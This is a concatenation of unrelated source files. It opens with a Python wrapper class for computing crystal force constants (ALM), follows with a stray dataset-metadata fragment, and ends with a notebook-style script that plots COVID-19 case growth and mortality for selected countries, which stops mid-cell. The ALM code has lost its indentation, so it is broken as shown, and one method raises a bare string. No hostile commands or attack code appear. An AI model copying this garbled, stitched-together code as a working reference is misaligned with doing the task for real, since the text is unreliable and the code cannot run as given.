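# A hedged illustration of setting optimizer_control on an ALM instance
# (keys follow optimizer_control_data_types above; the values are placeholders,
# not recommended settings):
#
#     alm.optimizer_control = {'cross_validation': 5,
#                              'l1_ratio': 1.0,
#                              'num_l1_alpha': 50}
#
# Keys that are omitted are passed as None to the C++ layer
# (see the optimizer_control setter below).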
class ALM(object):
"""Calculate harmonic and anharmonic interatomic force constants
Attributes
----------
lavec : ndarray
Basis vectors. a, b, c are given as row vectors.
shape=(3, 3), dtype='double'
xcoord : ndarray
Fractional coordinates of atomic points.
shape=(num_atoms, 3), dtype='double'
numbers : ndarray
Atomic numbers.
shape=(num_atoms,), dtype='intc'
kind_names : OrderedDict
Pairs of (atomic number, element name). Since the atomic number is the
key of OrderedDict, only unique atomic numbers are stored and the
order of ``numbers`` is preserved in the keys of this OrderedDict.
displacements : ndarray
Displacements of atoms in supercells used as training data.
shape=(supercells, num_atoms, 3), dtype='double', order='C'
forces : ndarray
Forces of atoms in supercells used as training data.
shape=(supercells, num_atoms, 3), dtype='double', order='C'
verbosity : int
Level of the output frequency either 0 (no output) or
1 (normal output). Default is 0.
output_filename_prefix : str
More detailed logs are stored in files when this is given. This string
is used to the prefix of filenames of logs.
optimizer_control : dict
Parameters to use elastic net regression.
cv_l1_alpha : float (read-only)
Alpha value to minimize fitting error of elastic net regression
obtained by cross validation.
"""
def __init__(self, lavec, xcoord, numbers, verbosity=0):
"""
Parameters
----------
lavec : array_like
Basis vectors. a, b, c are given as column vectors.
shape=(3, 3), dtype='double'
xcoord : array_like
Fractional coordinates of atomic points.
shape=(num_atoms, 3), dtype='double'
numbers : array_like
Atomic numbers.
shape=(num_atoms,), dtype='intc'
verbosity : int
Level of the output frequency either 0 (no output) or
1 (normal output). Default is 0.
"""
self._id = None
self._lavec = None
self._xcoord = None
self._numbers = None
self._verbosity = False
self._kind_names = None
self._iconst = 11
self._maxorder = 1
self.lavec = lavec
self.xcoord = xcoord
self.numbers = numbers
self._verbosity = verbosity
self._output_filename_prefix = None
        # Whether the python parameters need to be copied to the C++ instance
        # or not.
        self._need_transfer = True
        # Whether self.define() has already been called or not.
self._defined = False
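    # A hedged usage sketch (array shapes follow the class docstring above; the
    # call order is an assumption, not the only supported workflow):
    #
    #     with ALM(lavec, xcoord, numbers) as alm:
    #         alm.define(1)            # harmonic force constants only
    #         alm.displacements = u    # shape (num_supercells, num_atoms, 3)
    #         alm.forces = f           # shape (num_supercells, num_atoms, 3)
    #         info = alm.optimize()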
@property
def lavec(self):
"""Getter of basis vectors
Returns
-------
lavec : ndarray
Copy of basis vectors. a, b, c are given as row vectors.
shape=(3, 3), dtype='double', order='C'
"""
return np.array(self._lavec, dtype='double', order='C')
@lavec.setter
def lavec(self, lavec):
"""Setter of basis vectors
Parameters
----------
lavec : array_like
Basis vectors. a, b, c are given as row vectors.
shape=(3, 3), dtype='double', order='C'
"""
self._need_transfer = True
self._lavec = np.array(lavec, dtype='double', order='C')
@property
def xcoord(self):
"""Getter of atomic point coordinates
Returns
-------
xcoord : ndarray
Atomic point coordinates.
shape=(num_atom, 3), dtype='double', order='C'
"""
return np.array(self._xcoord, dtype='double', order='C')
@xcoord.setter
def xcoord(self, xcoord):
"""Setter of atomic point coordinates
Returns
-------
xcoord : ndarray
Atomic point coordinates.
shape=(num_atom, 3), dtype='double', order='C'
"""
self._need_transfer = True
self._xcoord = np.array(xcoord, dtype='double', order='C')
@property
def numbers(self):
"""Getter of atomic numbers
Returns
-------
numbers : ndarray
Atomic numbers.
shape=(num_atom,), dtype='intc', order='C'
"""
return np.array(self._numbers, dtype='intc')
@numbers.setter
def numbers(self, numbers):
"""Setter of atomic numbers
Parameters
----------
numbers : ndarray
Atomic numbers.
shape=(num_atom,), dtype='intc', order='C'
"""
self._need_transfer = True
self._numbers = np.array(numbers, dtype='intc')
self._kind_names = OrderedDict.fromkeys(self._numbers)
for key in self._kind_names:
self._kind_names[key] = atom_names[key % 118]
@property
def kind_names(self):
return self._kind_names
@property
def verbosity(self):
return self._verbosity
@verbosity.setter
def verbosity(self, verbosity):
"""Set verbosity of output.
Parameters
----------
verbosity : int
Choose the level of the output frequency from
0 (no output) or 1 (normal output).
"""
self._verbosity = verbosity
self._set_verbosity()
def set_verbosity(self, verbosity):
self.verbosity = verbosity
def __enter__(self):
self.alm_new()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.alm_delete()
def alm_new(self):
"""Create ALM instance in C++.
This is also called by context manager when entering the block.
ex.::
with ALM(lavec, xcoord, numbers) as alm:
Note
----
When an ALM instance is created by ``alm_new``, it must be deleted
        by ``alm_delete`` to avoid a memory leak.
"""
if self._id is None:
self._id = alm.alm_new()
if self._id < 0:
raise RuntimeError("Too many ALM objects")
if self._verbosity is not None:
self.verbosity = self._verbosity
else:
            raise RuntimeError("This ALM object is already initialized.")
def alm_delete(self):
"""Delete ALM instance in C++.
This is also called by context manager when exiting the block.
ex.::
with ALM(lavec, xcoord, numbers) as alm:
"""
if self._id is None:
self._show_error_not_initizalied()
alm.alm_delete(self._id)
self._id = None
def suggest(self):
"""Compute displacement patterns to obtain force constants."""
if self._id is None:
self._show_error_not_initizalied()
if self._defined:
alm.suggest(self._id)
else:
self._show_error_not_defined()
def optimize(self, solver='dense'):
"""Fit force constants to forces.
Parameters
----------
solver : str, default='dense'
Solver choice for fitting either 'dense' or 'SimplicialLDLT'.
- When solver='dense', the fitting is performed with the
singular value decomposition implemented in LAPACK.
- When solver='SimplicialLDLT', the fitting is performed with
the sparse solver class SimplicialLDLT implemented in
Eigen3 library.
Returns
-------
info : int
            This indicates how the fitting went.
0 if the fitting is successful, 1 otherwise.
"""
if self._id is None:
self._show_error_not_initizalied()
if not self._defined:
self._show_error_not_defined()
solvers = {'dense': 'dense', 'simplicialldlt': 'SimplicialLDLT'}
if solver.lower() not in solvers:
msgs = ["The given solver option is not supported.",
"Available options are 'dense' and 'SimplicialLDLT'."]
raise ValueError("\n".join(msgs))
info = alm.optimize(self._id, solvers[solver.lower()])
return info
@property
def output_filename_prefix(self):
return self._output_filename_prefix
@output_filename_prefix.setter
def output_filename_prefix(self, prefix):
"""Set output prefix of output filename"""
if self._id is None:
self._show_error_not_initizalied()
if type(prefix) is str:
self._output_filename_prefix = prefix
alm.set_output_filename_prefix(self._id, prefix)
def set_output_filename_prefix(self, prefix):
self.output_filename_prefix = prefix
@property
def optimizer_control(self):
if self._id is None:
self._show_error_not_initizalied()
optctrl = alm.get_optimizer_control(self._id)
keys = optimizer_control_data_types.keys()
optcontrol = dict(zip(keys, optctrl))
return optcontrol
@optimizer_control.setter
def optimizer_control(self, optcontrol):
if self._id is None:
self._show_error_not_initizalied()
keys = optimizer_control_data_types.keys()
optctrl = []
optcontrol_l = {key.lower(): optcontrol[key] for key in optcontrol}
for i, key in enumerate(optcontrol):
if key.lower() not in keys:
                msg = "%s is not a valid key for optimizer control." % key
raise KeyError(msg)
for i, key in enumerate(keys):
if key in optcontrol_l:
optctrl.append(optcontrol_l[key])
else:
optctrl.append(None)
alm.set_optimizer_control(self._id, optctrl)
def set_optimizer_control(self, optcontrol):
self.optimizer_control = optcontrol
@property
def displacements(self):
"""Get displacements
Returns
--------
u : ndarray
Atomic displacement patterns in supercells in Cartesian.
shape=(supercells, num_atoms, 3), dtype='double', order='C'
"""
if self._id is None:
self._show_error_not_initizalied()
ndata = alm.get_number_of_data(self._id)
u = np.zeros((ndata, len(self._xcoord), 3), dtype='double', order='C')
succeeded = alm.get_u_train(self._id, u)
if succeeded:
return u
else:
return None
@displacements.setter
def displacements(self, u):
"""Set displacements
Parameters
----------
u : array_like
Atomic displacement patterns in supercells in Cartesian.
shape=(supercells, num_atoms, 3), dtype='double'
"""
if self._id is None:
self._show_error_not_initizalied()
if u.ndim != 3:
msg = "Displacement array has to be three dimensions."
raise RuntimeError(msg)
alm.set_u_train(self._id, np.array(u, dtype='double', order='C'))
@property
def forces(self):
"""Get forces
Returns
--------
f : ndarray
Forces in supercells.
shape=(supercells, num_atoms, 3), dtype='double', order='C'
"""
if self._id is None:
self._show_error_not_initizalied()
ndata = alm.get_number_of_data(self._id)
f = np.zeros((ndata, len(self._xcoord), 3), dtype='double', order='C')
succeeded = alm.get_f_train(self._id, f)
if succeeded:
return f
else:
return None
@forces.setter
def forces(self, f):
"""Set forces
Parameters
----------
f : array_like
Forces in supercells.
shape=(supercells, num_atoms, 3), dtype='double'
"""
if self._id is None:
self._show_error_not_initizalied()
if f.ndim != 3:
msg = "Force array has to be three dimensions."
raise RuntimeError(msg)
alm.set_f_train(self._id, np.array(f, dtype='double', order='C'))
def set_training_data(self, u, f):
"""Set displacements and respective forces in supercell.
Parameters
----------
u : array_like
Atomic displacement patterns in supercells in Cartesian.
dtype='double'
shape=(supercells, num_atoms, 3)
f : array_like
Forces in supercells.
dtype='double'
shape=(supercells, num_atoms, 3)
"""
self.displacements = u
self.forces = f
def set_displacement_and_force(self, u, f):
warnings.warn("set_displacement_and_force is deprecated. "
"Use set_training_data.", DeprecationWarning)
self.set_training_data(u, f)
def define(self, maxorder, cutoff_radii=None, nbody=None,
symmetrization_basis='Lattice'):
"""Define the Taylor expansion potential.
Parameters
----------
maxorder : int
Maximum order of the Taylor expansion potential.
- If ``maxorder = 1``, only harmonic (2nd-order) terms are
considered.
- If ``maxorder = 2``, both harmonic and cubic terms are
considered.
cutoff_radii : array_like, default = None
Cutoff radii defined for each order.
When a negative value is provided, the cutoff radius is not used.
dtype='double'
shape=(maxorder, num_elems, num_elems)
nbody : array_like, default = None
Option to neglect multi-body interactions.
dtype='intc'
shape=(maxorder,)
symmetrization_basis : str, default='Lattice'
Either 'Cartesian' or 'Lattice'. Symmetrization of force constants
is done either in the matrix based on crystal coordinates
('Lattice') or Cartesian coordinates ('Cartesian').
"""
if self._id is None:
self._show_error_not_initizalied()
self._transfer_parameters()
if nbody is None:
nbody = []
for i in range(maxorder):
nbody.append(i + 2)
else:
if len(nbody) != maxorder:
msg = "The size of nbody must be equal to maxorder."
raise RuntimeError(msg)
if cutoff_radii is None:
_cutoff_radii = None
else:
_cutoff_radii = np.array(cutoff_radii, dtype='double', order='C')
nelem = len(_cutoff_radii.ravel())
if (nelem // maxorder) * maxorder != nelem:
msg = "The array shape of cutoff_radii is wrong."
raise RuntimeError(msg)
nkd = int(round(np.sqrt(nelem // maxorder)))
if nkd ** 2 - nelem // maxorder != 0:
msg = "The array shape of cutoff_radii is wrong."
raise RuntimeError(msg)
_cutoff_radii = np.reshape(_cutoff_radii, (maxorder, nkd, nkd),
order='C')
self._maxorder = maxorder
if symmetrization_basis.lower() in ['lattice', 'cartesian']:
fc_basis = symmetrization_basis.capitalize()
else:
fc_basis = 'Lattice'
alm.define(self._id,
maxorder,
np.array(nbody, dtype='intc'),
_cutoff_radii,
fc_basis)
alm.init_fc_table(self._id)
self._defined = True
def set_constraint(self, translation=True, rotation=False):
"""Set constraints for the translational and rotational invariances
Parameters
----------
translation : bool, optional (default = True)
When set to ``True``, the translational invariance
(aka acoustic sum rule) is imposed between force constants.
rotation : bool, optional (default = False)
When set to ``True``, the rotational invariance is imposed between
force constants. This function is not implemented.
"""
if rotation is True:
raise("Rotational invariance is not supported in python API.")
if translation is True:
iconst = 11
else:
iconst = 10
self._iconst = iconst
alm.set_constraint_type(self._id, self._iconst)
def getmap_primitive_to_supercell(self):
"""Returns the mapping information from the primitive cell to the supercell.
Returns
-------
map_p2s : array_like
The mapping information of atoms from the primitive cell to the
supercell.
dtype='intc'
shape = (num_trans, num_atoms_primitive)
"""
if self._id is None:
self._show_error_not_initizalied()
if not self._defined:
self._show_error_not_defined()
map_p2s = np.zeros(len(self._xcoord), dtype='intc')
ntrans = alm.get_atom_mapping_by_pure_translations(self._id, map_p2s)
return map_p2s.reshape((ntrans, -1))
def get_displacement_patterns(self, fc_order):
"""Returns the displacement patterns to obtain force constants.
Parameters
----------
fc_order : int
The order of force constants to get the displacement patterns.
- If ``fc_order = 1``, returns patterns for harmonic force
constants.
- If ``fc_order = 2``, returns patterns for cubic force constants.
- If ``fc_order = 3``, returns patterns for quartic force
constants.
- ...
Returns
-------
all_disps : array_like, shape = (n_patterns,)
The array of tuples (``atom_index``, ``direction``, ``basis``),
where ``direction`` is the numpy.ndarray of size = (3,)
representing the direction of the displacement,
and ``basis`` is a string either "Cartesian" or "Fractional".
"""
if self._id is None:
self._show_error_not_initizalied()
if fc_order > self._maxorder:
msg = ("The fc_order must not be larger than the maximum order "
"(maxorder).")
raise ValueError(msg)
numbers = self._get_number_of_displaced_atoms(fc_order)
tot_num = np.sum(numbers)
atom_indices = np.zeros(tot_num, dtype='intc')
disp_patterns = np.zeros((tot_num, 3), dtype='double', order='C')
nbasis = alm.get_displacement_patterns(self._id,
atom_indices,
disp_patterns,
fc_order)
basis = ["Cartesian", "Fractional"][nbasis]
all_disps = []
pos = 0
for num in numbers:
disp = []
for i in range(num):
disp.append((atom_indices[pos], disp_patterns[pos], basis))
pos += 1
all_disps.append(disp)
return all_disps
def get_fc(self, fc_order, mode="origin", permutation=True):
"""Returns the force constant values
Parameters
----------
fc_order : int
The order of force constants to get.
- If ``fc_order = 1``, returns harmonic force constants.
- If ``fc_order = 2``, returns cubic force constants.
- If ``fc_order = 3``, returns quartic force constants.
- ...
mode : str, optional (default="origin")
The choice of the force constant list to be returned.
- If "origin", returns the reducible set of force constants,
whose first element corresponds to an atom in the
primitive cell at the origin.
- If "all", returns the all non-zero elements of force constants
in the supercell.
- If "irreducible" or "irred", returns the irreducible set of
force constants.
permutation : bool (default=True)
The flag for printing out elements with permutation symmetry.
Effective only when ``mode = origin`` or ``mode = all``.
- If True, returns force constants after replicating elements
by the permutation of indices.
- If False, returns force constants without replicating elements
by the permutation of indices. For "origin" and "all", all
indices except the first index participate to the permutation
of indices to reduce the number of the output values.
Returns
-------
fc_values : array_like, dtype='double', shape=(num_fc,)
Force constant values.
elem_indices : array_like, dtype='int', shape=(num_fc, fc_order + 1)
Array of flattened indices 3 * index_atom + index_xyz.
Note
----
This method returns force constants in Cartesian basis
        when ``mode = origin`` and ``mode = all``.
When ``mode = irred``, it returns the irreducible set of
force constants in the basis defined via "symmetrization_basis"
of the alm.define method.
"""
if self._id is None:
self._show_error_not_initizalied()
if fc_order > self._maxorder:
msg = ("The fc_order must not be larger than the maximum order "
"(maxorder).")
raise ValueError(msg)
perm_int = permutation * 1
if mode == "origin":
fc_length = self._get_number_of_fc_origin(fc_order, perm_int)
fc_values = np.zeros(fc_length, dtype='double')
elem_indices = np.zeros((fc_length, fc_order + 1),
dtype='intc', order='C')
alm.get_fc_origin(self._id, fc_values, elem_indices, perm_int)
return fc_values, elem_indices
elif mode == "irreducible" or mode == "irred":
fc_length = self._get_number_of_irred_fc_elements(fc_order)
fc_values = np.zeros(fc_length, dtype='double')
elem_indices = np.zeros((fc_length, fc_order + 1),
dtype='intc', order='C')
alm.get_fc_irreducible(self._id, fc_values, elem_indices)
return fc_values, elem_indices
elif mode == "all":
map_p2s = np.zeros(len(self._xcoord), dtype='intc')
ntrans = alm.get_atom_mapping_by_pure_translations(self._id,
map_p2s)
fc_length = self._get_number_of_fc_origin(
fc_order, perm_int) * ntrans
fc_values = np.zeros(fc_length, dtype='double')
elem_indices = np.zeros((fc_length, fc_order + 1),
dtype='intc', order='C')
alm.get_fc_all(self._id, fc_values, elem_indices, perm_int)
return fc_values, elem_indices
else:
raise ValueError("Invalid mode in get_fc.")
def set_fc(self, fc_in):
"""Copy force constant obtained by an external optimizer to the ALM instance.
Parameters
----------
fc_in : array_like
The irreducible set of force constants.
dtype='double'
shape=(num_fc,)
Note
----
When an external optimizer, such as numpy.linalg.lstsq, is used to fit
force constants, the force constants need to be passed to
the ALM instance by ``set_fc`` to use the ``get_fc`` method.
"""
if self._id is None:
self._show_error_not_initizalied()
maxorder = self._maxorder
fc_length_irred = 0
for i in range(maxorder):
fc_length_irred += self._get_number_of_irred_fc_elements(i + 1)
if fc_length_irred != len(fc_in):
msg = "The size of the given force constant array is incorrect."
raise RuntimeError(msg)
alm.set_fc(self._id, np.array(fc_in, dtype='double', order='C'))
def get_matrix_elements(self):
"""Returns the sensing matrix A and force vector b
Returns
-------
amat : ndarray, dtype='double'
shape=(3 * num_atoms * ndata_training, num_fc_irred), order='F'.
The sensing matrix A calculated from the displacements.
bvec : ndarray, dtype='double'
shape=(3 * num_atoms * ndata_training,)
The vector b calculated from the atomic forces.
Note
----
From the amat (``A``) and bvec (``b``), the force constant vector ``x``
        can be obtained by solving the least-squares problem:
        x = argmin_x |Ax - b|^2.
"""
if self._id is None:
self._show_error_not_initizalied()
maxorder = self._maxorder
nrows = self._get_nrows_amat()
fc_length = 0
for i in range(maxorder):
fc_length += self._get_number_of_irred_fc_elements(i + 1)
amat = np.zeros(nrows * fc_length, dtype='double', order='C')
bvec = np.zeros(nrows, dtype='double')
alm.get_matrix_elements(self._id, amat, bvec)
return (np.reshape(amat, (nrows, fc_length), order='F'), bvec)
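    # Illustrative sketch (not from the original source): fitting the force
    # constants with an external optimizer, as suggested by the notes of
    # ``get_matrix_elements`` and ``set_fc``.  ``alm_instance`` is a
    # hypothetical, already-defined ALM object.
    #
    #     A, b = alm_instance.get_matrix_elements()
    #     fc = np.linalg.lstsq(A, b, rcond=None)[0]
    #     alm_instance.set_fc(fc)
    #     fc_values, elem_indices = alm_instance.get_fc(1, mode="irreducible")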
@property
def cv_l1_alpha(self):
"""Returns L1 alpha at minimum CV"""
if self._id is None:
self._show_error_not_initizalied()
return alm.get_cv_l1_alpha(self._id)
def get_cv_l1_alpha(self):
return self.cv_l1_alpha
def _transfer_parameters(self):
if self._need_transfer:
self._set_cell()
self._need_transfer = False
self._defined = False
def _set_cell(self):
"""Inject crystal structure in C++ instance"""
if self._id is None:
self._show_error_not_initizalied()
if self._lavec is None:
msg = "Basis vectors are not set."
raise RuntimeError(msg)
if self._xcoord is None:
msg = "Atomic point coordinates (positions) are not set."
raise RuntimeError(msg)
if self._numbers is None:
msg = "Atomic numbers are not set."
raise RuntimeError(msg)
if len(self._xcoord) != len(self._numbers):
msg = "Numbers of atomic points and atomic numbers don't agree."
raise RuntimeError(msg)
kind_numbers = np.array(list(self._kind_names.keys()), dtype='intc')
alm.set_cell(self._id, self._lavec, self._xcoord, self._numbers,
kind_numbers)
def _set_verbosity(self):
"""Inject verbosity in C++ instance."""
if self._id is None:
self._show_error_not_initizalied()
alm.set_verbosity(self._id, self._verbosity)
def _get_nrows_amat(self):
"""Private method to return the number of training data sets"""
if self._id is None:
self._show_error_not_initizalied()
nrows_amat = alm.get_nrows_amat(self._id)
return nrows_amat
def _get_id(self):
"""Private method to return the instance ID"""
return self._id
def _get_number_of_displacement_patterns(self, fc_order):
"""Private method to return the number of displacement patterns
Parameters
----------
fc_order : int
The order of force constants.
fc_order = 1 for harmonic, fc_order = 2 for cubic ...
"""
return alm.get_number_of_displacement_patterns(self._id, fc_order)
def _get_number_of_displaced_atoms(self, fc_order):
"""Private method to return the number of displaced atoms
Parameters
----------
fc_order : int
The order of force constants.
fc_order = 1 for harmonic, fc_order = 2 for cubic ...
"""
num_disp_patterns = self._get_number_of_displacement_patterns(
fc_order)
numbers = np.zeros(num_disp_patterns, dtype='intc')
alm.get_number_of_displaced_atoms(self._id, numbers, fc_order)
return numbers
def _get_number_of_fc_elements(self, fc_order):
"""Private method to get the number of force constants
Parameters
----------
fc_order : int
The order of force constants.
fc_order = 1 for harmonic, fc_order = 2 for cubic ...
"""
return alm.get_number_of_fc_elements(self._id, fc_order)
def _get_number_of_fc_origin(self, fc_order, permutation):
"""Private method to get the number of force constants for fc_origin
Parameters
----------
fc_order : int
The order of force constants.
fc_order = 1 for harmonic, fc_order = 2 for cubic ...
permutation: int
Flag to include permutated elements
permutation = 0 for skipping permutated elements,
permutation = 1 for including them
"""
return alm.get_number_of_fc_origin(self._id, fc_order, permutation)
def _get_number_of_irred_fc_elements(self, fc_order):
"""Private method to get the number of irreducible set of force constants
Parameters
----------
fc_order : int
The order of force constants.
fc_order = 1 for harmonic, fc_order = 2 for cubic ...
"""
return alm.get_number_of_irred_fc_elements(self._id, fc_order)
def _show_error_not_initizalied(self):
"""Private method to raise an error"""
msg = ("This ALM instance has to be initialized by ALM.alm_new() or "
"context manager.")
raise RuntimeError(msg)
def _show_error_not_defined(self):
msg = "This ALM.define() has to be done beforehand."
raise RuntimeError(msg)
``` |
{
"source": "jochym/covid_plots",
"score": 2
} |
#### File: jochym/covid_plots/Covid_plots.py
```python
import pandas as pd
import matplotlib.pyplot as plt
from matplotlib.dates import DateFormatter
import matplotlib.ticker as ticker
import numpy as np
from numpy import array, arange, polyfit, log, exp, polyval, linspace
from pandas.plotting import register_matplotlib_converters
register_matplotlib_converters()
# %%
# Use logarithmic scales?
LOGY=True
# Select countries of general interest
selcnt = []
#selcnt += ['China', 'Korea, South']
selcnt += ['United Kingdom', 'US']
selcnt += ['Sweden','Germany','Norway']
selcnt += ['Italy', 'Spain']
selcnt += ['Russia','Brazil']
selcnt = ['US', 'Brazil', 'Mexico', 'India']
selcnt += ['Italy', 'Spain']
selcnt += ['China', 'Korea, South']
# Countries for plwiki plots
plwiki = ['Poland', 'Slovakia', 'Germany', 'Czechia', 'Ukraine', 'Belarus', 'Russia']
# Countries to read in
countries = list(set(plwiki).union(set(selcnt)))
# %% jupyter={"source_hidden": true}
# Prepare the data
def fix_names(c):
'''
Fix differences in naming in population and covid datasets
'''
mapa = {'Korea, Rep.':'Korea, South',
'United States':'US',
'Slovak Republic':'Slovakia',
'Czech Republic':'Czechia',
'Russian Federation':'Russia'
}
rmap = {v:k for k,v in mapa.items()}
if c in mapa:
return mapa[c]
elif c in rmap:
return rmap[c]
else :
return c
# Loading population data
pop = pd.read_csv('https://raw.githubusercontent.com/datasets/population/master/data/population.csv')
# Population uses different country names - map it
pop_cnt = [fix_names(c) for c in countries]
population = {fix_names(c):n for c, _, _, n in
pop[pop['Country Name'].isin(pop_cnt) & (pop.Year==2018)].values}
# Loading covid data
df = pd.read_csv('https://raw.githubusercontent.com/datasets/covid-19/master/data/countries-aggregated.csv', parse_dates=['Date'])
# Limit to the selected countries
df = df[df['Country'].isin(countries)]
conf = df.pivot(index='Date', columns='Country', values='Confirmed')
recov = df.pivot(index='Date', columns='Country', values='Recovered')
vict = df.pivot(index='Date', columns='Country', values='Deaths')
relgr = conf.pct_change()
# Compute per capita values (per 100_000)
confpc = conf.copy()
for country in confpc:
confpc[country] = 1e6*confpc[country]/population[country]
victpc = vict.copy()
for country in victpc:
victpc[country] = 1e6*victpc[country]/population[country]
recovpc = recov.copy()
for country in recovpc:
recovpc[country] = 1e6*recovpc[country]/population[country]
# %% [markdown]
# ## Relative growth in time
#
# This one goes to the heart of exponential growth: if the spread is exponential, its relative growth is constant; if not, we get a linear change or some other curve.
# The exponent is much easier to distinguish by its growth rate (a tiny synthetic check follows the plot cell below).
#
# Additionally, exponential decay seems to fit the growth rate curves quite well.
# %%
fig = plt.figure(figsize=(10,7))
span = 5
rel = relgr.ewm(halflife=span).mean()
for n, c in enumerate(selcnt):
m = ~ (np.isnan(rel[c].values) | np.isinf(rel[c].values))
t = np.arange(m.size)
t = rel.index.to_pydatetime()
for s, v in zip(t[m][::-1], rel[c].values[m][::-1]):
if v>0.3 :
break
mm = m & (t > s)
x = arange(rel.index.size)
fit = polyfit(x[mm], log(rel[c].values[mm]), 1)
p = plt.semilogy(rel.index[m], 100*rel[c].values[m], '.')[0]
plt.plot(rel.index[mm], 100*rel[c].values[mm], '.', label=c, color=p.get_color())
#plt.plot(rel.index[mm], 100 * exp(polyval(fit, x[mm])), color=p.get_color())
# plt.axhline(5, ls='--', label='approx. critical value (5%)')
# plt.axhline(2, ls=':', label='effective critical value (2%)')
plt.ylim(None,50)
plt.xlim(pd.Timestamp('2020-03-5'),None)
plt.title('Daily relative growth of COVID-19 cases', fontsize = 16, weight = 'bold', alpha = .75)
plt.ylabel(f'Relative growth (%)\n{span}-day exponential weighted mean')
plt.xlabel('Date')
plt.grid()
plt.legend()
plt.savefig('relative_growth.png');
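# %%
# Quick synthetic sanity check of the claim above (illustrative only, not part
# of the original analysis): a purely exponential series has a constant
# relative (percentage) growth.
demo = pd.Series(100 * 1.1 ** np.arange(10))
print(demo.pct_change().dropna().round(6).unique())  # -> [0.1], i.e. a constant 10% growth per step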
# %% [markdown]
# ## Trajectory
# This one is inspired by the excellent https://aatishb.com/covidtrends/ page
# %% jupyter={"source_hidden": true}
plt.figure(figsize=(10,7))
span = 7
val = confpc
gr = val.diff().ewm(halflife=span).mean()
for n, c in enumerate(selcnt):
m = ~ gr[c].isnull()
plt.loglog(val[c][m].values, gr[c][m].values, '-', label=c, lw=2)
plt.xlim(10,None)
plt.ylim(1,3e2)
plt.title(f'Trajectory of COVID-19 pandemic ({str(val.index[-1]).split()[0]})', fontsize = 16, weight = 'bold', alpha = .75)
plt.ylabel('Average of daily growth per 1 mln people\n'+
f'{span}-day exponential weighted mean')
plt.xlabel('Cases per 1 mln people')
plt.legend()
plt.grid()
plt.savefig('trajectory.png');
# %% [markdown]
# ## Other curves
# %% jupyter={"source_hidden": true}
percapitaplot = confpc.ewm(halflife=span).mean()[selcnt].plot(figsize=(12,8), linewidth=5, logy=LOGY)
percapitaplot.grid(color='#d4d4d4')
percapitaplot.set_xlabel('Date')
percapitaplot.set_ylabel('# of Cases per 1 mln People\n'+
f'{span}-day exponential weighted mean')
percapitaplot.set_xlim(pd.Timestamp('2020-03-1'),None)
percapitaplot.set_ylim(1e-1, None)
percapitaplot.set_title("Per Capita COVID-19 Cases",
fontsize = 16, weight = 'bold', alpha = .75);
# %% jupyter={"source_hidden": true}
percapitaplot = (confpc - recovpc - victpc).ewm(halflife=span).mean()[selcnt].plot(figsize=(12,8), linewidth=5)
percapitaplot.grid(color='#d4d4d4')
percapitaplot.set_xlabel('Date')
percapitaplot.set_ylabel(f'# of Active cases per 1 mln people\n'+
f'({span}-day exponential weighted mean)')
percapitaplot.set_xlim(pd.Timestamp('2020-03-1'),None)
percapitaplot.set_title("Per Capita Active COVID-19 Cases",
fontsize = 16, weight = 'bold', alpha = .75);
plt.gcf().savefig('percapita_active.png');
# %% jupyter={"source_hidden": true}
vplot = victpc.ewm(halflife=span).mean()[selcnt].plot(figsize=(12,8), linewidth=5, logy=False)
vplot.grid(color='#d4d4d4')
vplot.set_xlabel('Date')
vplot.set_ylabel('# of Deaths per 1 mln People\n'+
f'({span}-day exponential weighted mean)')
vplot.set_xlim(pd.Timestamp('2020-03-1'),None)
vplot.set_ylim(1e-2, None)
vplot.set_title("Per Capita deaths due to COVID-19 Cases", fontsize = 16, weight = 'bold', alpha = .75);
# %% jupyter={"source_hidden": true}
mortplt = (100*vict/conf).ewm(halflife=span).mean()[selcnt].plot(figsize=(12,8), linewidth=5, logy=False)
mortplt.grid(color='#d4d4d4')
mortplt.set_xlim(pd.Timestamp('2020-03-1'),None)
mortplt.set_ylim(0, 20)
mortplt.set_xlabel('Date')
mortplt.set_ylabel('Mortality rate (%)\n'+f'{span}-day exponential weighted mean')
mortplt.set_title('Mortality rate due to COVID-19', fontsize = 16, weight = 'bold', alpha = .75);
# %% [markdown]
# ## Polish Wikipedia plots
# These are plots created for Polish Wikipedia
# %%
fig = plt.figure(figsize=(10,7))
def plleg(c):
pl = {
'Poland':'Polska',
'Slovakia': 'Słowacja',
'Germany': 'Niemcy',
'Czechia': 'Czechy',
'Ukraine': 'Ukraina',
'Belarus': 'Białoruś',
'Russia': 'Rosja'
}
if c in pl:
return pl[c]
else :
return c
span = 3
rel = relgr.ewm(halflife=span).mean()
model = {}
for n, c in enumerate(plwiki):
m = ~ (np.isnan(rel[c].values) | np.isinf(rel[c].values))
t = np.arange(m.size)
t = rel.index.to_pydatetime()
for s, v in zip(t[m][::-1], rel[c].values[m][::-1]):
if v>0.3 :
break
mm = m & (t > s)
x = arange(rel.index.size)
fit = polyfit(x[mm], log(rel[c].values[mm]), 1)
model[c] = fit, x[mm]
p = plt.semilogy(rel.index[m], 100*rel[c].values[m], '.')[0]
plt.plot(rel.index[mm], 100*rel[c].values[mm],
'o' if c=='Poland' else '.',
color=p.get_color(), label=plleg(c),
zorder = 3 if c=='Poland' else 2,
)
# plt.plot(rel.index[mm], 100 * exp(polyval(fit, x[mm])),
# color=p.get_color(),
# lw=3 if c=='Poland' else 2,
# zorder = 3 if c=='Poland' else 2)
# plt.axhline(5, ls='--', label='Przybliżony poziom krytyczny (5%)')
# plt.axhline(2, ls=':', label='Efektywny poziom krytyczny (2%)')
plt.ylim(None,50)
plt.xlim(pd.Timestamp('2020-03-5'),None)
plt.title(f'Dzienny wzrost przypadków COVID-19 ({str(rel.index[-1]).split()[0]})', fontsize = 16, weight = 'bold', alpha = .75)
plt.ylabel(f'Dzienny wzrost zakażeń (%, {span}-dniowa wykładnicza średnia krocząca)')
plt.xlabel('Data')
plt.grid()
plt.legend(loc='lower left')
plt.savefig('wzrosty_dzienne.png', dpi=72);
# %% jupyter={"source_hidden": true}
plt.figure(figsize=(10,7))
val = confpc
span = 7
gr = val.diff().ewm(halflife=span).mean()
for n, c in enumerate(plwiki):
m = ~ gr[c].isnull()
p = plt.loglog(val[c][m].values, gr[c][m].values,
'-', lw=3 if c=='Poland' else 2, label=plleg(c),
zorder = 3 if c=='Poland' else 2)
(b, a), t = model[c]
c0 = val[c][-1]/exp(exp(b*t.max()+a)/b)
ci = gr[c][m].values[-1]/(exp(exp(b*t.max()+a)/b)*exp(b*t.max()+a))
t = linspace(t.min(), t.max()+60, 100)
#plt.loglog(exp(exp(b*t+a)/b)*c0,exp(exp(b*t+a)/b)*exp(b*t+a)*ci, ls=':', color=p[0].get_color())
plt.xlim(2,None)
